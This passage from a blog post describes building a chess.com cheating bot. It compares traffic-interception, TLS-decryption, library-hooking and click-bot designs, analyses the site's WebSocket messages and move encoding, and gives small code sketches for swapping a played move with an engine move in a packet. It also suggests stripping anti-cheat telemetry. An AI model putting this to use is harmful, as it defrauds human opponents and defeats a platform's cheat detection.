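<p>The reason the equal length matters can be shown in a few lines. This is only a sketch: the function name and the sample payload in the usage note are hypothetical and not the real chess.com message format. The point is that a same-length swap leaves the size of the buffer, and therefore all framing around it, untouched.</p>

```python
def replace_move(payload, played, engine_move):
    """Swap the move the human played for the engine's move, keeping the length."""
    if len(played) != len(engine_move):
        raise ValueError("moves must have the same length")
    index = payload.rfind(played)
    if index == -1:
        # Not a move message: pass it through untouched.
        return payload
    return payload[:index] + engine_move + payload[index + len(played):]
```

<p>For a made-up plaintext buffer such as <em>b'{"move":"a2a3"}'</em>, calling <em>replace_move(buffer, b"a2a3", b"e2e4")</em> yields a buffer of exactly the same size with only the move bytes changed.</p>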
<p>And there is only one place where I can do this: Inside of the browser
process space, in some networking function that sends and receives the
target packets. This was my idea. I knew that it must be possible to
find this <em>hook point</em> and to alter the packets somewhere.</p>
<p>But hell, I didn't know that this approach would be that hard to pull off!</p>
<p>So before I'll dive into the technical internals, I'll discuss the
different possible architectures and designs of cheating <em>in particular</em>
for a chess.com bot, but which are also perfectly applicable <em>to general
browser game automation</em>.</p>
<h3 id="chap_dwmbgb">Many different ways to make browser game bots!</h3>
<ol>
<li><strong>A high level approach</strong> would be to inject custom JavaScript into
the DOM of a running browser session.<br>
This piece of JavaScript then connects to a local server (e.g. a
simple server listening on localhost:SOMEPORT) that responds with a
bot-calculated move when queried with the current game action
history. A pretty nice example of this technique is <a href="http://www.youtube.com/watch?v=PW1vMXHJdnM" title="high level javascript bot">this video on
YouTube</a>
(I suppose it uses this design paradigm, but I can't be sure because
the source isn't available to investigate further).<br>
<em>Advantages</em>: Comparatively easy implementation, because we don't need
to tinker with packets and can directly attack the game logic. Works
on all platforms and in all browsers, because JavaScript is
universally runnable.<br>
<em>Drawbacks:</em> Maybe we can't build a connection to localhost due to
the same-origin policy (Can we?). This would render this approach
impossible, since we absolutely need a way to communicate with the
local program that supplies us with engine moves. Also, a
socket connection (even one to localhost) might be slower
than other
<a href="http://en.wikipedia.org/wiki/Inter-process_communication" title="inter process communication techniques">IPC</a>
techniques, because of the TCP/IP stack overhead.</li>
<li><strong>Another high level technique</strong> would be to write a custom browser
extension that intercepts the browser game traffic and injects bot
calculated moves.<br>
<em>Advantages</em>: We don't need to deal with SSL/TLS decryption
because our application is executed in the browser process.
Furthermore it must be somehow possible to communicate with a local
process that supplies the extension with engine knowledge.<br>
<em>Disadvantages</em>: Platform and browser dependent code. When going
down that road, I would need to write platform independent C code
for different browsers. Additionally, it's questionable whether we can
talk to other processes, because of the browser sandboxes and
their security policies.</li>
<li><strong>Another approach: Low level network stack interception
technique:</strong> I could sniff on the network interface where the TCP
packets of the communication sessions are exchanged, using an
appropriate API like
<a href="http://www.secdev.org/projects/scapy/" title="awesome python security module">scapy</a>
or <a href="http://www.tcpdump.org/" title="the library behind tcpdump">libpcap</a>
(when writing C directly). Because the communication is encrypted
with SSL/TLS, there needs to be a reliable way to decrypt the TCP
packets. This is not a trivial task, since different browsers use
different ciphers/HMACs for TLS/SSL (they are determined in the
<a href="http://en.wikipedia.org/wiki/Transport_Layer_Security#TLS_handshake" title="SSL handshake protocol">handshake</a>).<br>
This issue however is alleviated by the fact that some browsers can
be started with an option (environment variable
<a href="https://developer.mozilla.org/en-US/docs/NSS_Key_Log_Format">SSLKEYLOGFILE</a>)
to dump the current key secrets of an SSL/TLS session to a file which
my bot could use to decrypt/encrypt the traffic on the fly.<br>
Once decrypted, I would modify the appropriate move values and
replace the action I made with the bot-calculated move. Then I need
to encrypt the packet again with the session keys from the
SSLKEYLOGFILE. But this raises several issues, for example:<br>
How can my sniffer/bot know which cipher was used? It only knows
the current keys for the session, but not the ciphers. In the worst
case, we also need to sniff the SSL/TLS handshake at the start of the
connection. This again is a very tedious process because of the many quirks
and variations in how a TLS session begins.<br>
Padding shouldn't be a big issue because the moves in the packet
are just replaced and no additional data is injected or deleted. So
the TCP packets should keep the same size. We only need to recalculate
the checksums.</li>
<li>Another <em>thoroughly</em> low level approach: <strong>Hooking <a href="http://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html">.so
libraries</a>!</strong>
This was my idea while running in the forest!<br>
This might be the hardest approach in the investigation and
research phase (It's not an easy task to find the correct hooking
points in the HUGE Chromium or Firefox code base, but it looks like
the <a href="https://developer.mozilla.org/en-US/docs/NSS">NSS library</a> is a
good starting point), but also the most elegant way, because we
don't need to deal with SSL/TLS quirks and can work with plaintext
HTTP requests/responses once we find a good hook point. This
approach, although very elegant and straightforward, comes with huge
drawbacks:<br>
Hooking is very platform dependent. On Linux we could hook with
kernel modules or the <a href="http://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/">LD_PRELOAD
trick</a>.
On Windows we'd need other hooking techniques like IAT hooking,
using the Microsoft hooking library or something else. Additionally,
we need to know the target architecture (differences between x86 and
amd64). But from what I know now, this approach seems to be the best
compared to the others, because we can work in the target process
space (the browser userland process space itself) and we do not
reassemble/decrypt packets ourselves (like in the previous
technique). <strong>Form grabbers are a related technique</strong> used by
blackhats for their trojans.</li>
<li>
<p><strong>The traditional way</strong>: Re-implement the high level browser game
protocol by forging messages and HTTP requests. This is not very
elegant, because our goal is just to modify packets, yet
following this approach we'd need to rebuild the whole game logic
(or at least many parts). This would look something like the following:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">requests</span>

<span class="c1"># Placeholder credentials and URLs, for illustration only</span>
<span class="n">user</span><span class="p">,</span> <span class="n">password</span> <span class="o">=</span> <span class="s1">'someuser'</span><span class="p">,</span> <span class="s1">'somepass'</span>
<span class="n">session</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">Session</span><span class="p">()</span>  <span class="c1"># keeps the login cookies</span>
<span class="n">login</span> <span class="o">=</span> <span class="n">session</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="s1">'https://browsergame.com'</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="p">{</span><span class="s1">'login'</span><span class="p">:</span> <span class="n">user</span><span class="p">,</span> <span class="s1">'password'</span><span class="p">:</span> <span class="n">password</span><span class="p">})</span>
<span class="k">if</span> <span class="n">login</span><span class="o">.</span><span class="n">ok</span><span class="p">:</span>
    <span class="n">response</span> <span class="o">=</span> <span class="n">session</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'https://browsergame.com/action.php?gamelogic=blabla'</span><span class="p">)</span>
    <span class="c1"># Implement the game logic here</span>
</code></pre></div>
</li>
<li>
<p><strong>The easy way:</strong> Make a click bot! Just control the mouse
programmatically and initiate actions like a human would.<br>
Normally such bots learn where the chess board is located in the browser
window by comparing the pixel
colors of the screen with the color of the chess squares (or
whatever field you want to locate). Slightly more advanced would be
to locate the HTML elements that represent the squares and
recalculate the exact location based on viewport sizes, settings
and rendering. But I don't know how it is actually done, do you have
an idea?<br>
Anyways, the huge majority of chess.com bots are of this
architecture type. You can view them in action
<a href="http://www.youtube.com/watch?v=1SwOskkPnS0">here</a> or
<a href="http://www.youtube.com/watch?v=5osrRuz4tvM" title="high level chess.com bot">here</a>
on YouTube.<br>
<em>Advantages</em>: Very easy to implement, very powerful technique, very
good possibilities to evade anti-cheating techniques (For instance,
if <em>there were</em> cheat detection <em>besides</em> the kind that flags
very strong play as engine originated, it would
try to find out whether the current player is human by interpreting
mouse movements and intervals between moves. But somewhere this
information has to be gathered and sent to a server. We could just
remove this submission and therefore the server has no way to learn
that we are cheaters).</p>
</li>
</ol>
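<p>For the click bot from the last item, the "recalculate the exact location" step is mostly arithmetic once the board's position on screen is known. The following is a rough sketch under my own assumptions: the board is a square, its top-left pixel and edge length were found beforehand (by pixel colors or from the HTML elements), and the function and parameter names are invented for this example.</p>

```python
def square_center(square, board_left, board_top, board_size, white_at_bottom=True):
    """Return the (x, y) pixel at the center of a square such as 'e4'."""
    file_index = ord(square[0]) - ord("a")  # a..h -> 0..7
    rank_index = int(square[1]) - 1         # 1..8 -> 0..7
    cell = board_size / 8
    if white_at_bottom:
        # Rank 1 is drawn at the bottom, so rows count down from the top.
        col, row = file_index, 7 - rank_index
    else:
        # Board flipped for the black player.
        col, row = 7 - file_index, rank_index
    return (board_left + (col + 0.5) * cell, board_top + (row + 0.5) * cell)
```

<p>A move like <em>e2e4</em> then becomes a mouse press at <em>square_center("e2", ...)</em> followed by a release at <em>square_center("e4", ...)</em>; how the mouse is actually driven depends on the platform and is left out here.</p>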
<h3 id="chap_internals">What do chess.com's internals look like?</h3>
<p>Having discussed the different architectures for a bot (Remember: I
chose the hooking technique!) it was time to learn more about the
target.</p>
<p>My plan was very ambitious, because I had very little experience with
hooking processes and hell, I hadn't coded in C or assembly for over 1.5
years, nor did I have much experience before that. Muppets! Even now, I
know nothing about low level stuff at all.</p>
<p>So it was definitely time <strong>to get my learning hat on</strong> and to
investigate how <a href="http://chess.com">chess.com</a> works.</p>
<p>I based a lot of my investigations on the <a href="https://code.google.com/p/v8/">V8
debugger</a>, the one integrated in the
Chrome browser dev tools. I am not much of a Google fan, but Jesus
fucking Christ, Chrome's Developer Tools (the stuff that pops up when
you click on <em>Inspect Element</em> in the context menu) are just a very well
crafted tool!</p>
<p>It's very fast, never hangs or loads noticeably, and there are so many
features whilst maintaining a very clear and concise interface. If you
don't know how to use it, I really suggest spending an hour
on this tutorial (Do the assignments, otherwise what you learned won't
stick): <a href="https://developers.google.com/chrome-developer-tools/docs/javascript-debugging">DevTools javascript debugger
tutorial</a>.</p>
<p>So by using this debugger I found out that chess.com's inner client-side
machinery essentially consists of around 30k lines of JavaScript code.
There are three major files, LiveChessAdvanced.js, LiveChessBase.js and
LiveChessCore.js; you can see an excerpt in the screenshot below:</p>
<p><a href="https://incolumitas.com/uploads/2014/01/Screenshot-from-2014-01-26-055418.png"><img alt="Look into the chess.com internals with the Chrome debugging tools" src="https://incolumitas.com/uploads/2014/01/Screenshot-from-2014-01-26-055418-1024x515.png"></a>
<em>Look into the chess.com internals with the Chrome debugging
tools</em></p>
<p>Furthermore all of chess.com's networking is handled by a file called
cometd.js, so chess.com makes use of the <em>Bayeux protocol</em>. You can
learn more about the javascript library on
<a href="http://cometd.org/">cometd.org</a>.</p>
<p>But why such a strange protocol?</p>
<p>HTTP/1.1 is a request-response protocol; it's not suited to implementing
complex game protocols.</p>
<p>This was quite an issue in the last years, because companies wanted to
bring complex applications (like browser games) to the browser and so
they implemented a range of techniques that circumvented these obstacles
by exploiting some HTTP quirks, like the fact that HTTP connections stay
open under specific circumstances. One example is loading JavaScript in chunks (a
form of long polling: it basically just creates <em>script</em> elements in
excess and points their <em>src</em> attribute to the cometd server, which
then sends back JavaScript (or JSONP) with events as its payload).
Alternatively, you can achieve the same with frames. All these techniques
are summarized under the umbrella term Comet, and <a href="http://en.wikipedia.org/wiki/Comet_(programming)">you should read
about them on
Wikipedia</a>.</p>
<p>But in late 2011 the <a href="http://tools.ietf.org/html/rfc6455" title="RFC for WebSocket">WebSocket
standard</a> was
established in its final form and nowadays we don't need to make use of
Comet techniques (At least I assume that WebSocket should replace these
techniques), because we can make bi-directional, full-duplex
(simultaneous communication in both directions) TCP-like connections
using WebSockets. And this is exactly what chess.com does: it
exclusively uses WebSockets for its protocol when the connection is
good enough.</p>
<p>But now comes the first quirk: I strongly assume that this cometd.js
library provides fallbacks for the case where it detects that WebSockets
aren't working for some reason. This happened to me quite often:</p>
<p>My internet connection here is very messy and I have a speed limit of
around 60kps downstream and around 10kps upstream. I don't know if this
could be a reason, that <a href="https://github.com/cometd/cometd" title="cometd on github">the
library</a> sometimes
changes protocols, but it certainly does. I first realized this when I
was able to intercept the game traffic using the HttpHeaders Firefox
plugin (which, as the name suggests, only captures HTTP traffic) and
then suddenly in the next game the captured traffic was empty. So I
concluded that the protocol responsible for the game traffic must be
chosen dynamically, with connection stability apparently being one of the
deciding factors!</p>
<p>So enough written, <strong>show me some protocol examples of chess.com</strong> you
shout! Here you go:</p>
<p>This is a typical WebSocket JSON message from the server that updates
the game state of a game (This packet belongs to a game that I
was kibitzing, not one I played myself):</p>
<div class="highlight"><pre><span></span><code>[{"data":{"sid":"gserv","game":{"id":709324515,"gametype":"chess","time":{"basetime":600,"timeinc":0},"players":[{"uid":"DAHUANXIONG","status":"online","lag":2,"lagms":220,"lightning":2105,"blitz":2064,"standard":1361,"lightning960":1200,"blitz960":1200,"standard960":1200,"bughouse":1200,"ml":10,"title":null,"mod":false,"new":false,"country":"CN","av":true,"avatar":"//d1lalstwiwz2br.cloudfront.net/images_users/avatars/DAHUANXIONG_small.1.jpeg","clientfeatures":{"examineboard":true,"multiplegames":true,"clientname":"LC4Full v2013121801; Chrome/25; Windows"},"nonverified":true},{"uid":"Mrsinj","status":"playing","lag":2,"lagms":259,"gid":709324515,"lightning":2153,"blitz":2205,"standard":1200,"lightning960":1200,"blitz960":1200,"standard960":1200,"bughouse":1200,"ml":10,"title":null,"mod":false,"new":false,"country":"RS","av":true,"avatar":"//d1lalstwiwz2br.cloudfront.net/images_users/avatars/Mrsinj_s.1.jpg","clientfeatures":{"examineboard":false,"multiplegames":true,"clientname":"LC4Simple v2013121801; Chrome/32; Windows"}}]},"tid":"Game"},"channel":"/game/~1"}]
</code></pre></div>
<p>If you're not a fan of such unformatted, jammed JSON data, you should
inspect it in an online JSON editor like
<a href="http://www.jsoneditoronline.org/">www.jsoneditoronline.org</a>.</p>
<p>A few interesting fields: <em>uid</em> identifies the players, <em>status</em> can be
<em>starting</em>, <em>in_progress</em>, <em>aborted</em> or <em>stopped</em>, <em>lag</em> and <em>lagms</em>
specify the lag of the player (How can you measure that?). Funny enough,
the protocol architect uses redundant information here: <em>lag</em> is just
a coarser version of <em>lagms</em> (in the samples in this post it equals <em>lagms</em>
divided by 100 and rounded down) and carries no additional information.</p>
<p><em>gid</em> is the global game id. For instance, you should be able to revisit
the game above under the following link
<em>http://www.chess.com/livechess/game?id=709324515</em>. But this particular
message above is not of much interest, because it doesn't contain any
moves; it just provides some status information. The packets that are
sent on every move look like the next message:</p>
<div class="highlight"><pre><span></span><code>[{"data":{"sid":"gserv","game":{"id":709324427,"status":"in_progress","seq":9,"players":[{"uid":"ImaginaryDunker","status":"playing","lag":1,"lagms":132,"gid":709324427},{"uid":"Alexander_Donchenko","status":"playing","lag":1,"lagms":115,"gid":709324427}],"moves":"gvYIlBIBvB0KBrZJow","clocks":[582,571],"draws":[],"squares":[0,0]},"tid":"GameState"},"channel":"/game/709324427"}]
</code></pre></div>
<p>Three fields are of particular importance,
<em>"moves":"gvYIlBIBvB0KBrZJow"</em>, <em>"clocks":[582,571]</em> and
<em>"status":"in_progress"</em>. They are pretty much self explanatory at this
point I suppose.</p>
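<p>Pulling these fields out of a decrypted message takes only a few lines. The sketch below is just an illustration: the function name is made up, and the sample is an abridged copy of the message above (the <em>players</em>, <em>draws</em> and <em>squares</em> fields are left out to keep it short).</p>

```python
import json

# Abridged copy of the GameState message shown above.
SAMPLE = (
    '[{"data":{"sid":"gserv","game":{"id":709324427,"status":"in_progress",'
    '"seq":9,"moves":"gvYIlBIBvB0KBrZJow","clocks":[582,571]},'
    '"tid":"GameState"},"channel":"/game/709324427"}]'
)


def game_states(raw):
    """Yield a summary dict for every GameState entry in a raw message."""
    for entry in json.loads(raw):
        data = entry.get("data") or {}
        if data.get("tid") != "GameState":
            # Meta messages and other message types carry no move list.
            continue
        game = data["game"]
        yield {
            "id": game["id"],
            "status": game["status"],
            "seq": game["seq"],
            "moves": game["moves"],
            "clocks": game["clocks"],
        }
```

<p>Filtering on <em>tid</em> keeps everything that is not a game state update out of the way, so the bot only reacts to messages that actually carry a <em>moves</em> string.</p>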
<p>So let's finally <strong>look at a typical game session</strong> in terms of parsed
WebSocket messages. Please note that I might not include all messages
that are exchanged in a game session, simply because I don't care too
much for trivial information (like polling the server for specific
features). The messages below are the ones which count when you want to
understand a typical game session:</p>
<p>First of all, a connection message to the server is sent when the
browser connects to the server:</p>
<p><strong>1. Initial connection outbound message</strong></p>
<div class="highlight"><pre><span></span><code><span class="p">[{</span><span class="s2">"channel"</span><span class="s s-Atom">:</span><span class="s2">"/meta/connect"</span><span class="p">,</span><span class="s2">"connectionType"</span><span class="s s-Atom">:</span><span class="s2">"ssl-websocket"</span><span class="p">,</span><span class="s2">"advice"</span><span class="s s-Atom">:</span><span class="p">{</span><span class="s2">"timeout"</span><span class="s s-Atom">:</span><span class="mi">0</span><span class="p">},</span><span class="s2">"id"</span><span class="s s-Atom">:</span><span class="s2">"10"</span><span class="p">,</span><span class="s2">"clientId"</span><span class="s s-Atom">:</span><span class="s2">"6djua267g6n8ydja21m8yhztj3gtpx"</span><span class="p">,</span><span class="s2">"ext"</span><span class="s s-Atom">:</span><span class="p">{</span><span class="s2">"ack"</span><span class="p">:-</span><span class="mi">1</span><span class="p">,</span><span class="s2">"timesync"</span><span class="s s-Atom">:</span><span class="p">{</span><span class="s2">"tc"</span><span class="s s-Atom">:</span><span class="mi">1390715596738</span><span class="p">,</span><span class="s2">"l"</span><span class="s s-Atom">:</span><span class="mi">661</span><span class="p">,</span><span class="s2">"o"</span><span class="p">:-</span><span class="mi">17527952</span><span class="p">}}}]</span>
</code></pre></div>
<p>I am not sure what encoding/encryption the clientId uses, but it didn't
matter for my purpose of writing a bot. So when I accept a challenge from
another player, I receive a packet like this:</p>
<p><strong>2. Game begins</strong></p>
<div class="highlight"><pre><span></span><code>[{"data":{"sid":"gserv","game":{"id":709341692,"status":"starting","seq":0,"players":[{"uid":"ponkhan","status":"playing","lag":2,"lagms":285,"gid":709341692},{"uid":"EatingSpiders","status":"playing","lag":1,"lagms":177,"gid":709341692}],"abortable":[true,true],"moves":"","clocks":[600,600],"draws":[],"repeated":true,"squares":[0,0]},"tid":"GameState"},"channel":"/game/709341692"}]
</code></pre></div>
<p>Noteworthy is the <em>status</em> "starting". As you can see, the <em>moves</em> value
is still empty. Then my adversary made a move and I again received a
message in the same style as above:</p>
<p><strong>3. First move received</strong></p>
<div class="highlight"><pre><span></span><code>[{"data":{"sid":"gserv","game":{"id":709341692,"status":"starting","seq":1,"players":[{"uid":"ponkhan","status":"playing","lag":3,"lagms":381,"gid":709341692},{"uid":"EatingSpiders","status":"playing","lag":1,"lagms":183,"gid":709341692}],"abortable":[true,true],"moves":"mC","clocks":[600,600],"draws":[],"squares":[0,0]},"tid":"GameState"},"channel":"/game/709341692"}]
</code></pre></div>
<p>Now <em>moves</em> isn't empty anymore, it contains <em>"mC"</em>, but what the heck
does it mean?</p>
<p>It's basically an encoding chess.com uses for its move notation. I don't
know why they chose it; maybe it is a form of compression, because it
uses n/2 of the space, where n is the number of bytes used in
<a href="http://en.wikipedia.org/wiki/Algebraic_notation_(chess)">algebraic chess
notation</a>.</p>
<p>But I honestly doubt it, because there are far better compression
methods for 64 possible squares (and some promotion combinations).</p>
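<p>To see what the encoding does in practice, here is a small decoding sketch. It rests on an assumption of mine: the character order below is inferred from the pattern in the look-up table from LiveChessCore.js quoted further down (a1 is "a", b1 is "b", a2 is "i", a8 is "4" and so on), not taken from chess.com's code. The 62 letters and digits only cover a1 through f8, so g8, h8 and promotions are not handled, and the function names are made up.</p>

```python
import string

# Assumed order: one character per square, counting a1, b1, ..., h1, a2, ...
# These 62 characters cover a1 through f8 only.
ALPHABET = string.ascii_lowercase + string.ascii_uppercase + string.digits


def decode_square(char):
    """Map one encoded character to a square name such as 'e4'."""
    index = ALPHABET.index(char)  # raises ValueError for unknown characters
    return "abcdefgh"[index % 8] + str(index // 8 + 1)


def decode_moves(encoded):
    """Split the moves string into two-character moves and decode each one."""
    pairs = [encoded[i:i + 2] for i in range(0, len(encoded), 2)]
    return [decode_square(src) + decode_square(dst) for src, dst in pairs]
```

<p>Under that assumption, <em>decode_moves("mC")</em> gives <em>["e2e4"]</em>, and the 18 characters of <em>"gvYIlBIBvB0KBrZJow"</em> from the earlier message decode to nine moves, which matches its <em>"seq":9</em>.</p>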
<p>Maybe it's a way to stop stupid cheaters like me from pursuing their
devilish deeds, but that can't be it either, since the method that
decodes/decrypts the move notation is nothing more than a simple look-up
table:</p>
<p>Here is the relevant code part of the obfuscated javascript source in
LiveChessCore.js, at line 8577 (after applying Chrome's pretty print
functionality):</p>
<div class="highlight"><pre><span></span><code><span class="p">(</span><span class="n">function</span><span class="p">()</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">zf9bd6</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">function</span><span class="p">()</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z6439d</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{</span><span class="s">"a1"</span><span class="o">:</span><span class="w"> </span><span class="s">"a"</span><span class="p">,</span><span class="s">"a2"</span><span class="o">:</span><span class="w"> </span><span class="s">"i"</span><span class="p">,</span><span class="s">"a3"</span><span class="o">:</span><span class="w"> </span><span class="s">"q"</span><span class="p">,</span><span class="s">"a4"</span><span class="o">:</span><span class="w"> </span><span class="s">"y"</span><span class="p">,</span><span class="s">"a5"</span><span class="o">:</span><span class="w"> </span><span class="s">"G"</span><span class="p">,</span><span class="s">"a6"</span><span class="o">:</span><span class="w"> </span><span class="s">"O"</span><span class="p">,</span><span class="s">"a7"</span><span class="o">:</span><span class="w"> </span><span class="s">"W"</span><span class="p">,</span><span class="s">"a8"</span><span class="o">:</span><span class="w"> </span><span class="s">"4"</span><span class="p">,</span><span class="s">"b1"</span><span class="o">:</span><span class="w"> </span><span class="s">"b"</span><span class="p">,</span><span class="s">"b2"</span><span class="o">:</span><span class="w"> </span><span class="s">"j"</span><span class="p">,</span><span class="s">"b3"</span><span class="o">:</span><span class="w"> </span><span class="s">"r"</span><span class="p">,</span><span class="s">"b4"</span><span class="o">:</span><span class="w"> </span><span class="s">"z"</span><span class="p">,</span><span class="s">"b5"</span><span class="o">:</span><span class="w"> </span><span class="s">"H"</span><span class="p">,</span><span class="s">"b6"</span><span class="o">:</span><span class="w"> </span><span class="s">"P"</span><span class="p">,</span><span class="s">"b7"</span><span 
class="o">:</span><span class="w"> </span><span class="s">"X"</span><span class="p">,</span><span class="s">"b8"</span><span class="o">:</span><span class="w"> </span><span class="s">"5"</span><span class="p">,</span><span class="s">"c1"</span><span class="o">:</span><span class="w"> </span><span class="s">"c"</span><span class="p">,</span><span class="s">"c2"</span><span class="o">:</span><span class="w"> </span><span class="s">"k"</span><span class="p">,</span><span class="s">"c3"</span><span class="o">:</span><span class="w"> </span><span class="s">"s"</span><span class="p">,</span><span class="s">"c4"</span><span class="o">:</span><span class="w"> </span><span class="s">"A"</span><span class="p">,</span><span class="s">"c5"</span><span class="o">:</span><span class="w"> </span><span class="s">"I"</span><span class="p">,</span><span class="s">"c6"</span><span class="o">:</span><span class="w"> </span><span class="s">"Q"</span><span class="p">,</span><span class="s">"c7"</span><span class="o">:</span><span class="w"> </span><span class="s">"Y"</span><span class="p">,</span><span class="s">"c8"</span><span class="o">:</span><span class="w"> </span><span class="s">"6"</span><span class="p">,</span><span class="s">"d1"</span><span class="o">:</span><span class="w"> </span><span class="s">"d"</span><span class="p">,</span><span class="s">"d2"</span><span class="o">:</span><span class="w"> </span><span class="s">"l"</span><span class="p">,</span><span class="s">"d3"</span><span class="o">:</span><span class="w"> </span><span class="s">"t"</span><span class="p">,</span><span class="s">"d4"</span><span class="o">:</span><span class="w"> </span><span class="s">"B"</span><span class="p">,</span><span class="s">"d5"</span><span class="o">:</span><span class="w"> </span><span class="s">"J"</span><span class="p">,</span><span class="s">"d6"</span><span class="o">:</span><span class="w"> </span><span class="s">"R"</span><span class="p">,</span><span class="s">"d7"</span><span 
class="o">:</span><span class="w"> </span><span class="s">"Z"</span><span class="p">,</span><span class="s">"d8"</span><span class="o">:</span><span class="w"> </span><span class="s">"7"</span><span class="p">,</span><span class="s">"e1"</span><span class="o">:</span><span class="w"> </span><span class="s">"e"</span><span class="p">,</span><span class="s">"e2"</span><span class="o">:</span><span class="w"> </span><span class="s">"m"</span><span class="p">,</span><span class="s">"e3"</span><span class="o">:</span><span class="w"> </span><span class="s">"u"</span><span class="p">,</span><span class="s">"e4"</span><span class="o">:</span><span class="w"> </span><span class="s">"C"</span><span class="p">,</span><span class="s">"e5"</span><span class="o">:</span><span class="w"> </span><span class="s">"K"</span><span class="p">,</span><span class="s">"e6"</span><span class="o">:</span><span class="w"> </span><span class="s">"S"</span><span class="p">,</span><span class="s">"e7"</span><span class="o">:</span><span class="w"> </span><span class="s">"0"</span><span class="p">,</span><span class="s">"e8"</span><span class="o">:</span><span class="w"> </span><span class="s">"8"</span><span class="p">,</span><span class="s">"f1"</span><span class="o">:</span><span class="w"> </span><span class="s">"f"</span><span class="p">,</span><span class="s">"f2"</span><span class="o">:</span><span class="w"> </span><span class="s">"n"</span><span class="p">,</span><span class="s">"f3"</span><span class="o">:</span><span class="w"> </span><span class="s">"v"</span><span class="p">,</span><span class="s">"f4"</span><span class="o">:</span><span class="w"> </span><span class="s">"D"</span><span class="p">,</span><span class="s">"f5"</span><span class="o">:</span><span class="w"> </span><span class="s">"L"</span><span class="p">,</span><span class="s">"f6"</span><span class="o">:</span><span class="w"> </span><span class="s">"T"</span><span class="p">,</span><span class="s">"f7"</span><span 
class="o">:</span><span class="w"> </span><span class="s">"1"</span><span class="p">,</span><span class="s">"f8"</span><span class="o">:</span><span class="w"> </span><span class="s">"9"</span><span class="p">,</span><span class="s">"g1"</span><span class="o">:</span><span class="w"> </span><span class="s">"g"</span><span class="p">,</span><span class="s">"g2"</span><span class="o">:</span><span class="w"> </span><span class="s">"o"</span><span class="p">,</span><span class="s">"g3"</span><span class="o">:</span><span class="w"> </span><span class="s">"w"</span><span class="p">,</span><span class="s">"g4"</span><span class="o">:</span><span class="w"> </span><span class="s">"E"</span><span class="p">,</span><span class="s">"g5"</span><span class="o">:</span><span class="w"> </span><span class="s">"M"</span><span class="p">,</span><span class="s">"g6"</span><span class="o">:</span><span class="w"> </span><span class="s">"U"</span><span class="p">,</span><span class="s">"g7"</span><span class="o">:</span><span class="w"> </span><span class="s">"2"</span><span class="p">,</span><span class="s">"g8"</span><span class="o">:</span><span class="w"> </span><span class="s">"!"</span><span class="p">,</span><span class="s">"h1"</span><span class="o">:</span><span class="w"> </span><span class="s">"h"</span><span class="p">,</span><span class="s">"h2"</span><span class="o">:</span><span class="w"> </span><span class="s">"p"</span><span class="p">,</span><span class="s">"h3"</span><span class="o">:</span><span class="w"> </span><span class="s">"x"</span><span class="p">,</span><span class="s">"h4"</span><span class="o">:</span><span class="w"> </span><span class="s">"F"</span><span class="p">,</span><span class="s">"h5"</span><span class="o">:</span><span class="w"> </span><span class="s">"N"</span><span class="p">,</span><span class="s">"h6"</span><span class="o">:</span><span class="w"> </span><span class="s">"V"</span><span class="p">,</span><span class="s">"h7"</span><span 
class="o">:</span><span class="w"> </span><span class="s">"3"</span><span class="p">,</span><span class="s">"h8"</span><span class="o">:</span><span class="w"> </span><span class="s">"?"</span><span class="p">};</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">ze8500</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{</span><span class="s">"_a"</span><span class="o">:</span><span class="w"> </span><span class="s">"a1"</span><span class="p">,</span><span class="s">"_i"</span><span class="o">:</span><span class="w"> </span><span class="s">"a2"</span><span class="p">,</span><span class="s">"_q"</span><span class="o">:</span><span class="w"> </span><span class="s">"a3"</span><span class="p">,</span><span class="s">"_y"</span><span class="o">:</span><span class="w"> </span><span class="s">"a4"</span><span class="p">,</span><span class="s">"_G"</span><span class="o">:</span><span class="w"> </span><span class="s">"a5"</span><span class="p">,</span><span class="s">"_O"</span><span class="o">:</span><span class="w"> </span><span class="s">"a6"</span><span class="p">,</span><span class="s">"_W"</span><span class="o">:</span><span class="w"> </span><span class="s">"a7"</span><span class="p">,</span><span class="s">"_4"</span><span class="o">:</span><span class="w"> </span><span class="s">"a8"</span><span class="p">,</span><span class="s">"_b"</span><span class="o">:</span><span class="w"> </span><span class="s">"b1"</span><span class="p">,</span><span class="s">"_j"</span><span class="o">:</span><span class="w"> </span><span class="s">"b2"</span><span class="p">,</span><span class="s">"_r"</span><span class="o">:</span><span class="w"> </span><span class="s">"b3"</span><span class="p">,</span><span class="s">"_z"</span><span class="o">:</span><span class="w"> </span><span class="s">"b4"</span><span class="p">,</span><span class="s">"_H"</span><span class="o">:</span><span class="w"> </span><span class="s">"b5"</span><span class="p">,</span><span class="s">"_P"</span><span class="o">:</span><span class="w"> </span><span class="s">"b6"</span><span class="p">,</span><span class="s">"_X"</span><span 
class="o">:</span><span class="w"> </span><span class="s">"b7"</span><span class="p">,</span><span class="s">"_5"</span><span class="o">:</span><span class="w"> </span><span class="s">"b8"</span><span class="p">,</span><span class="s">"_c"</span><span class="o">:</span><span class="w"> </span><span class="s">"c1"</span><span class="p">,</span><span class="s">"_k"</span><span class="o">:</span><span class="w"> </span><span class="s">"c2"</span><span class="p">,</span><span class="s">"_s"</span><span class="o">:</span><span class="w"> </span><span class="s">"c3"</span><span class="p">,</span><span class="s">"_A"</span><span class="o">:</span><span class="w"> </span><span class="s">"c4"</span><span class="p">,</span><span class="s">"_I"</span><span class="o">:</span><span class="w"> </span><span class="s">"c5"</span><span class="p">,</span><span class="s">"_Q"</span><span class="o">:</span><span class="w"> </span><span class="s">"c6"</span><span class="p">,</span><span class="s">"_Y"</span><span class="o">:</span><span class="w"> </span><span class="s">"c7"</span><span class="p">,</span><span class="s">"_6"</span><span class="o">:</span><span class="w"> </span><span class="s">"c8"</span><span class="p">,</span><span class="s">"_d"</span><span class="o">:</span><span 